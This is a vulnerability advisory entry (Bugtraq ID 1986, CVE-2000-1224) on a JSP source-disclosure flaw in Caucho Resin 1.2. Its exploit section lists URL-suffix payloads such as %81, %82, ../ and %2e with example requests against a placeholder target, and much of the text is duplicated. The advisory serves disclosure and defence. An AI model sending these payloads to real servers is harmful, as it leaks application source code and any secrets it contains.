Caucho Technology Resin 1.2 JSP Source Disclosure Vulnerability
BID:1986
Info
Caucho Technology Resin 1.2 JSP Source Disclosure Vulnerability
| Bugtraq ID: | 1986 |
| Class: | Input Validation Error |
| CVE: |
CVE-2000-1224 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Nov 23 2000 12:00AM |
| Updated: | Mar 19 2015 09:21AM |
| Credit: | Discovered and submitted by email on Nov 23, 2000 benjurry <[email protected]>. |
| Vulnerable: |
Caucho Resin 1.2 |
| Not Vulnerable: | |
Discussion
Caucho Technology Resin 1.2 JSP Source Disclosure Vulnerability
Resin is a servlet and JSP engine that supports java and javascript.
ServletExec will return the source code of JSP files when an HTTP request is appended with certain characters. This vulnerability is dependent on the platform that Resin is running on.
Successful exploitation could lead to the disclosure of sensitive information contained within JSP pages.
Resin is a servlet and JSP engine that supports java and javascript.
ServletExec will return the source code of JSP files when an HTTP request is appended with certain characters. This vulnerability is dependent on the platform that Resin is running on.
Successful exploitation could lead to the disclosure of sensitive information contained within JSP pages.
Exploit / POC
Caucho Technology Resin 1.2 JSP Source Disclosure Vulnerability
The following exploit has been provided by benjurry <[email protected]>:
Apache (Win32):
..
%2e..
%81
%82
Example: http://target/filename.jsp%81
Resin Web Server:
../
Example: http://target/filename.jsp../
IIS 5 requesting the URL encoded with ASCII:
'%2' instead of '.'
Example: http://target/filename%2ejsp
The following exploit has been provided by benjurry <[email protected]>:
Apache (Win32):
..
%2e..
%81
%82
Example: http://target/filename.jsp%81
Resin Web Server:
../
Example: http://target/filename.jsp../
IIS 5 requesting the URL encoded with ASCII:
'%2' instead of '.'
Example: http://target/filename%2ejsp
References
Caucho Technology Resin 1.2 JSP Source Disclosure Vulnerability
References:
References:
- Caucho Technology Homepage (Caucho Technology)